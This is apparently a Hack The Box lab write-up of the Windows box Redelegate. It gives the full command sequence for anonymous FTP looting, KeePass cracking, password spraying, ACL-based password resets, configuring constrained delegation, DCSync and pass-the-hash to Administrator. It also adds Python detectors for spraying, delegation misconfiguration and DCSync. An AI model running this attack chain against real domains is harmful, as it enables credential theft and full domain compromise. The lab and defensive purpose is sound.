Archwarden
HTB: Redelegate
Tags: HTB, Windows, Hard, Retired

Techniques: FTP Anonymous Access, KeePass Cracking, RID Brute Force, Password Spraying, BloodHound Enumeration, ForceChangePassword, SeEnableDelegationPrivilege Abuse, Constrained Delegation Abuse, DCSync, Pass-the-Hash

Summary

Redelegate is a Windows domain controller that chains several misconfigurations across a realistic attack path. Anonymous FTP access exposes a KeePass database alongside training materials that hint directly at the password format in use. Cracking the database reveals SQL credentials used for RID brute force enumeration, and spraying those usernames with the same seasonal password pattern lands a domain credential. BloodHound maps an ACL chain through ForceChangePassword to a WinRM-capable account. Privilege escalation combines two misconfigurations: SeEnableDelegationPrivilege on Helen.Frost and GenericAll over the FS01$ machine account. Together they allow configuring constrained delegation on FS01$, impersonating the domain controller, and performing DCSync.

Flags:


Detailed Walkthrough

Enumeration

Nmap Scan

Full TCP scan first:

sudo nmap -p- --min-rate 1000 -T4 10.129.234.50 -oA TCP_allports

Extract open ports and run detailed enumeration:

ports=$(grep open TCP_allports.nmap | awk -F/ '{print $1}' | tr '\n' ',' | sed 's/,$//')
sudo nmap -p $ports -sC -sV -vv -oA TCP_detailed 10.129.234.50
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd  [anonymous login allowed]
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: redelegate.vl)
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00
3268/tcp open  ldap          Microsoft Windows AD LDAP (Domain: redelegate.vl)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)
9389/tcp open  mc-nmf        .NET Message Framing
  • 21 (FTP) allows anonymous login and nmap already shows three files present — first thing to pull
  • 88/389/3268 confirm a domain controller, domain is redelegate.vl
  • 1433 (MSSQL) is open — worth testing any credentials we find
  • 5985 (WinRM) is open — credentials will get us a shell
  • 3389 (RDP) is available as a backup access method

The scan reported a ~3 hour clock skew. Fix it before any Kerberos operations:

sudo nano /etc/hosts
# 10.129.234.50  redelegate.vl dc.redelegate.vl

sudo ntpdate 10.129.234.50

FTP Anonymous Access

ftp 10.129.234.50

Log in with anonymous:anonymous:

FTP anonymous login successful

Three files are present. Pull them all:

binary
mget *

Downloading all files from FTP

Read both text files before touching the KeePass database:

TrainingAgenda.txt — weak password training content hinting at SeasonYear! format

CyberAudit.txt — two items in progress: remove unused domain objects, recheck ACLs

The third training agenda talk is titled “Why SeasonYear! is not a good password”. This is a direct hint at the password convention in use. The audit document flags unused domain objects and ACL misconfigurations as open items, both worth keeping in mind later for lateral movement and privilege escalation.

KeePass Cracking

Build a seasonal password list going back four years:

Spring2026!
Summer2026!
Autumn2026!
Fall2026!
Winter2026!
Spring2025!
Summer2025!
Autumn2025!
Fall2025!
Winter2025!
Spring2024!
Summer2024!
Autumn2024!
Fall2024!
Winter2024!
Spring2023!
Summer2023!
Autumn2023!
Fall2023!
Winter2023!

Convert the KeePass database to a crackable hash and run it against the list:

keepass2john Shared.kdbx > Shared.kdbx.hash
john --wordlist=seasonal.txt Shared.kdbx.hash

John cracking the KeePass hash to Fall2024!

Master password: Fall2024!

Open the database:

KeePass database opened

Seven entries are stored inside. Testing each credential set against the available services, only SQLGuest authenticates:

KeePass entry showing SQLGuest credentials

nxc mssql 10.129.234.50 -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth

NXC confirming SQLGuest credentials are valid against MSSQL

Finding 1 — Anonymous FTP Access Exposing KeePass Credential Store with Predictable Master Password

User Enumeration and Password Spray

With a valid MSSQL account, use RID brute force to enumerate domain users:

nxc mssql 10.129.234.50 -u 'SQLGuest' -p 'zDPBpaF4FywlqIv11vii' --local-auth --rid-brute

RID brute force returning domain usernames

Build a user list from the results:

Administrator
Guest
Christine.Flanders
Marie.Curie
Helen.Frost
Michael.Pontiac
Mallory.Roberts
James.Dinkleberg
Ryan.Cooper
sql_svc

Spray the seasonal password list against all users over SMB:

nxc smb 10.129.234.50 -u users.txt -p seasonal.txt --continue-on-success

NXC password spray returning Marie.Curie:Fall2024!

One hit: Marie.Curie:Fall2024!
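From the defender's side, a spray run with --continue-on-success leaves a distinctive trace on the domain controller: a burst of 4625 failures from one source address, one attempt per account across many accounts, and then a 4624 for whichever account the seasonal password fit. The Python below is an added detection example written for this writeup; it is not part of the original post or of NetExec. The event lines, timestamps and addresses are constructed, and the key=value layout (EventID=, TargetUserName=, IpAddress=, Status=) is an assumed SIEM export format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export of Windows Security events (not real box telemetry).
# 4625 = failed logon, 4624 = successful logon, 0xC000006D = bad user name or password.
SAMPLE_EVENTS = [
    # one source address, one failure per account, many accounts: the spray signature
    "2024-11-02T10:00:01 EventID=4625 TargetUserName=Christine.Flanders IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:02 EventID=4625 TargetUserName=Marie.Curie IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:03 EventID=4625 TargetUserName=Helen.Frost IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:04 EventID=4625 TargetUserName=Michael.Pontiac IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:05 EventID=4625 TargetUserName=Mallory.Roberts IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:06 EventID=4625 TargetUserName=James.Dinkleberg IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:07 EventID=4625 TargetUserName=Ryan.Cooper IpAddress=10.10.14.5 Status=0xC000006D",
    "2024-11-02T10:00:08 EventID=4624 TargetUserName=Marie.Curie IpAddress=10.10.14.5 Status=0x0",
    # one user failing repeatedly from a workstation: a typo or stale credential, not a spray
    "2024-11-02T10:05:00 EventID=4625 TargetUserName=Ryan.Cooper IpAddress=10.10.20.31 Status=0xC000006D",
    "2024-11-02T10:05:10 EventID=4625 TargetUserName=Ryan.Cooper IpAddress=10.10.20.31 Status=0xC000006D",
    "2024-11-02T10:05:20 EventID=4625 TargetUserName=Ryan.Cooper IpAddress=10.10.20.31 Status=0xC000006D",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+) Status=(?P<status>\S+)$"
)


def parse_events(lines):
    """Turn the assumed key=value export into dicts; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "id": int(m["id"]),
            "user": m["user"].lower(),
            "ip": m["ip"],
        })
    return events


def detect_password_spray(lines, window=timedelta(minutes=10), min_users=5):
    """Flag source addresses whose failed logons hit at least `min_users` distinct
    accounts inside `window`, and record which of those accounts later logged on
    successfully from the same address (the account the spray landed on)."""
    events = parse_events(lines)
    failures = defaultdict(list)
    successes = defaultdict(set)
    for e in events:
        if e["id"] == 4625:
            failures[e["ip"]].append(e)
        elif e["id"] == 4624:
            successes[e["ip"]].add(e["user"])

    alerts = []
    for ip, fails in failures.items():
        fails.sort(key=lambda e: e["ts"])
        # sliding window: widest set of distinct accounts failed within `window`
        start, best = 0, set()
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            users = {e["user"] for e in fails[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            alerts.append({
                "ip": ip,
                "distinct_users": len(best),
                "failed_attempts": len(fails),
                "followed_by_success": sorted(best & successes[ip]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The threshold on distinct accounts, rather than on total failures, is what separates a spray from a lockout: the workstation address above racks up three failures and produces no alert, while the spraying address never fails the same account twice and is still flagged. Tune `min_users` and `window` to the size of the user base.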

Active Directory Enumeration — BloodHound

Collect BloodHound data with valid credentials:

rusthound-ce -d redelegate.vl -u 'Marie.Curie' -p 'Fall2024!' -o ./bh -z

RustHound collecting BloodHound data

Start BloodHound and import the data:

bloodhound-start

BloodHound started

BloodHound login

Data ingested into BloodHound

Mark Marie.Curie as owned and run the shortest path from owned principals:

Marking Marie.Curie as owned in BloodHound

Running shortest paths from owned principals cypher

The graph reveals a clear ACL chain:

BloodHound map showing Marie.Curie → Helpdesk → ForceChangePassword → Helen.Frost → Remote Management Users

The CyberAudit document mentioned ACLs being rechecked as an open item. The ForceChangePassword edge is exactly the kind of misconfiguration that audit was supposed to catch.

Foothold — WinRM as Helen.Frost

Reset Helen.Frost’s password via the ForceChangePassword right:

bloodyAD --host 10.129.234.50 -d redelegate.vl -u 'Marie.Curie' -p 'Fall2024!' set password Helen.Frost Password1!

bloodyAD resetting Helen.Frost's password via ForceChangePassword

evil-winrm -i 10.129.234.50 -u Helen.Frost -p 'Password1!'

Evil-WinRM session established as Helen.Frost, user flag retrieved

Finding 2 — ACL Misconfiguration Allowing Unauthorized Password Reset and Lateral Movement


Privilege Escalation

Identifying the Attack Surface

whoami /priv

whoami /priv showing SeEnableDelegationPrivilege

Helen.Frost holds SeEnableDelegationPrivilege, a privilege that allows configuring delegation settings on accounts, including setting the TRUSTED_TO_AUTH_FOR_DELEGATION flag and writing msDS-AllowedToDelegateTo. Back in BloodHound, her group membership reveals the second half of the attack:

BloodHound showing IT group has GenericAll over FS01$

Helen.Frost is a member of the IT group, which holds GenericAll over the FS01$ machine account. Combined with SeEnableDelegationPrivilege, the attack chain is:

  1. Reset FS01$’s password via GenericAll
  2. Set TRUSTED_TO_AUTH_FOR_DELEGATION on FS01$ via SeEnableDelegationPrivilege
  3. Configure msDS-AllowedToDelegateTo targeting cifs/dc.redelegate.vl
  4. Use FS01$’s TGT to request a service ticket impersonating the DC machine account via S4U2self + S4U2proxy
  5. DCSync using that ticket
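The state this chain produces is also what an audit script should be looking for: a machine account with the TRUSTED_TO_AUTH_FOR_DELEGATION bit set and msDS-AllowedToDelegateTo pointing at a service on a domain controller. The Python below is an added example written for this writeup, not code from the box, from bloodyAD or from BloodHound. It decodes the delegation-related bits of userAccountControl (the bit values are the documented AD ones) and rates each account. The account records are constructed to mirror the end state of the chain above; the hostnames, the extra accounts and the severity labels are assumptions.

```python
# userAccountControl bits relevant here (values as documented for the AD schema)
UAC_FLAGS = {
    0x200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",            # set on domain controller accounts
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",         # unconstrained delegation
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
SERVER_TRUST_ACCOUNT = 0x2000
TRUSTED_FOR_DELEGATION = 0x80000
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Constructed sample of account objects, as they might be read back over LDAP.
# FS01$ reflects the state after steps 2 and 3 above; the other accounts are assumed.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC$", "userAccountControl": 0x82000, "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "FS01$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["cifs/dc.redelegate.vl"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000,
     "msDS-AllowedToDelegateTo": ["http/app.redelegate.vl"]},
    {"sAMAccountName": "sql_svc", "userAccountControl": 0x10200, "msDS-AllowedToDelegateTo": []},
]
DC_HOSTS = frozenset({"dc.redelegate.vl"})  # domain controller host names (constructed)


def decode_uac(uac):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if uac & bit]


def spn_host(spn):
    """'cifs/dc.redelegate.vl:445' -> 'dc.redelegate.vl'."""
    return spn.split("/", 1)[-1].split(":", 1)[0].lower()


def audit_delegation(accounts, dc_hosts=DC_HOSTS):
    """Rate each account's delegation configuration. Delegation to a DC service is
    the worst case because a ticket for a DC service lets the holder act as any
    impersonated principal against the DC, including for replication."""
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = acct["userAccountControl"]
        targets = acct.get("msDS-AllowedToDelegateTo", [])
        is_dc = bool(uac & SERVER_TRUST_ACCOUNT)

        if uac & TRUSTED_FOR_DELEGATION and not is_dc:
            findings.append({"account": name, "severity": "HIGH",
                             "detail": "unconstrained delegation on a non-DC account"})
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append({"account": name, "severity": "HIGH",
                             "detail": "protocol transition enabled (TRUSTED_TO_AUTH_FOR_DELEGATION)"})

        dc_targets = [t for t in targets if spn_host(t) in dc_hosts]
        if dc_targets:
            findings.append({"account": name, "severity": "CRITICAL",
                             "detail": "constrained delegation to DC service(s): " + ", ".join(dc_targets)})
        elif targets:
            findings.append({"account": name, "severity": "INFO",
                             "detail": "constrained delegation to " + ", ".join(targets)})
    return findings


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{f['severity']:8} {f['account']:8} {f['detail']}")
```

Two things follow for hardening. The audit in CyberAudit.txt was about ACLs, and GenericAll over FS01$ is what let the password reset happen; but the bit that turned a password reset into domain compromise is SeEnableDelegationPrivilege, so the same audit should list every principal holding that user right. And a DC$ account with TRUSTED_FOR_DELEGATION is normal, which is why the script exempts SERVER_TRUST_ACCOUNT objects from the unconstrained-delegation finding rather than suppressing the flag altogether.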

Configuring Constrained Delegation on FS01$

Get a TGT for Helen.Frost to authenticate bloodyAD via Kerberos:

impacket-getTGT redelegate.vl/HELEN.FROST:'Password1!'
export KRB5CCNAME=HELEN.FROST.ccache

getTGT returning a TGT for Helen.Frost

Exporting KRB5CCNAME for Helen.Frost

Reset FS01$’s password using Kerberos authentication:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set password "FS01$" 'Password1!'

bloodyAD resetting FS01$ password via GenericAll

Confirm the credentials work:

nxc smb redelegate.vl -u FS01$ -p 'Password1!'

NXC confirming FS01$ credentials are valid

Set the TRUSTED_TO_AUTH_FOR_DELEGATION flag on FS01$:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" add uac FS01$ -f TRUSTED_TO_AUTH_FOR_DELEGATION

bloodyAD setting TRUSTED_TO_AUTH_FOR_DELEGATION on FS01$

Configure the delegation target:

bloodyAD -d redelegate.vl -k --host "dc.redelegate.vl" set object FS01$ msDS-AllowedToDelegateTo -v 'cifs/dc.redelegate.vl'

bloodyAD setting msDS-AllowedToDelegateTo to cifs/dc.redelegate.vl

S4U2self + S4U2proxy — Impersonating the Domain Controller

Get a TGT for FS01$:

impacket-getTGT redelegate.vl/fs01\$:'Password1!' -dc-ip 10.129.234.50
export KRB5CCNAME=fs01\$.ccache

getTGT returning a TGT for FS01$

Exporting KRB5CCNAME for FS01$

Request a service ticket impersonating the dc machine account against the CIFS service on the DC:

impacket-getST -k -no-pass redelegate.vl/fs01\$ -spn cifs/dc.redelegate.vl -impersonate dc -dc-ip 10.129.234.50

getST returning a service ticket impersonating the dc machine account

DCSync

export KRB5CCNAME=dc@cifs_dc.redelegate.vl@REDELEGATE.VL.ccache

Exporting KRB5CCNAME for the CIFS service ticket

impacket-secretsdump -k dc.redelegate.vl -just-dc-user Administrator

secretsdump DCSync returning the Administrator NTLM hash

Administrator NTLM hash recovered: ec17f7a2a4d96e177bfd101b94ffc0a7
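DCSync is normally detected from Security event 4662 carrying the directory replication extended rights, raised by a principal that is not a domain controller. This chain defeats that rule as written: the service ticket impersonates the DC machine account, so the 4662 subject is DC$ and looks like ordinary replication. The extra signal is where the session came from, which 4624 records. The Python below is an added detection example for this writeup, not part of the original post or of Impacket; it correlates 4662 with the 4624 logon session and alerts when a DC account replicates from an address that is not a DC. The GUIDs are the documented replication extended rights; the events, logon ids, addresses and DC inventory are constructed.

```python
# Extended rights used by directory replication (documented AD rights GUIDs)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed DC inventory (assumed, not from the box): account names and addresses
DC_ACCOUNTS = frozenset({"dc$", "dc2$"})
DC_IPS = frozenset({"10.129.234.50", "10.129.234.51"})

# Constructed sample events. 4624 gives the logon session id and source address;
# 4662 gives the subject, its session id and the access rights exercised.
SAMPLE_EVENTS = [
    # the DC account logging on over the network from an attacker workstation, then replicating
    {"EventID": 4624, "TargetUserName": "DC$", "TargetLogonId": "0x3e7a1",
     "IpAddress": "10.10.14.5", "LogonType": 3},
    {"EventID": 4662, "SubjectUserName": "DC$", "SubjectLogonId": "0x3e7a1",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},
    # a real DC-to-DC replication: same rights, but from a DC address
    {"EventID": 4624, "TargetUserName": "DC2$", "TargetLogonId": "0x51c00",
     "IpAddress": "10.129.234.51", "LogonType": 3},
    {"EventID": 4662, "SubjectUserName": "DC2$", "SubjectLogonId": "0x51c00",
     "Properties": [GET_CHANGES, GET_CHANGES_ALL]},
    # a user account exercising replication rights: always suspicious
    {"EventID": 4624, "TargetUserName": "svc_backup", "TargetLogonId": "0x7a300",
     "IpAddress": "10.10.20.31", "LogonType": 3},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x7a300",
     "Properties": [GET_CHANGES_ALL]},
    # a 4662 without replication rights (a plain object read): ignored
    {"EventID": 4662, "SubjectUserName": "Helen.Frost", "SubjectLogonId": "0x99999",
     "Properties": ["bf967a86-0de6-11d0-a285-00aa003049e2"]},
]


def detect_dcsync(events, dc_accounts=DC_ACCOUNTS, dc_ips=DC_IPS):
    """Alert on 4662 events that exercise replication rights when either the subject
    is not a DC account, or it is a DC account whose logon session (via 4624's
    logon id) originated from an address that is not a domain controller."""
    session_ip = {}
    for e in events:
        if e["EventID"] == 4624:
            session_ip[e["TargetLogonId"]] = e["IpAddress"]

    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = [REPLICATION_RIGHTS[g] for g in e["Properties"] if g in REPLICATION_RIGHTS]
        if not rights:
            continue
        subject = e["SubjectUserName"]
        src = session_ip.get(e["SubjectLogonId"], "unknown")
        if subject.lower() not in dc_accounts:
            reason = "replication rights exercised by a non-DC principal"
        elif src not in dc_ips:
            reason = "DC account replicating from a non-DC address"
        else:
            continue  # DC replicating from a DC: normal
        alerts.append({"subject": subject, "source_ip": src, "rights": rights, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

A session whose 4624 is missing from the window comes back as "unknown" and, for a DC account, is still alerted, since an unknown source is not a known DC. The same source-address logic is the basis for the network-side version of this detection: DRSUAPI traffic should only ever flow between domain controllers.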

Finding 3 — SeEnableDelegationPrivilege Combined with GenericAll Allowing Constrained Delegation Configuration and Domain Compromise

Administrator Access

evil-winrm -i redelegate.vl -u Administrator -H 'ec17f7a2a4d96e177bfd101b94ffc0a7'

Evil-WinRM session as Administrator, root flag retrieved


Takeaways

How this box helped me prepare for the CPTS exam

  1. Read everything you pull from FTP before touching binaries. The text files on this box handed over the password format directly. On engagements and the exam, treat documents as intelligence. They often tell you exactly what to try.

  2. keepass2john into John or Hashcat is a standard workflow. KeePass databases appear regularly on Windows engagements. The conversion step is simple and the payoff is high. If you find a .kdbx, always crack it.

  3. Run whoami /priv immediately after getting a foothold and look up anything non-standard. Most user accounts have a predictable baseline set of privileges. Anything outside that baseline was granted for a reason, and that reason often maps to an attack path. SeEnableDelegationPrivilege standing out on a helpdesk account is the kind of thing that gets missed if you only skim the output. Build the habit of checking every privilege against what a standard user should have.
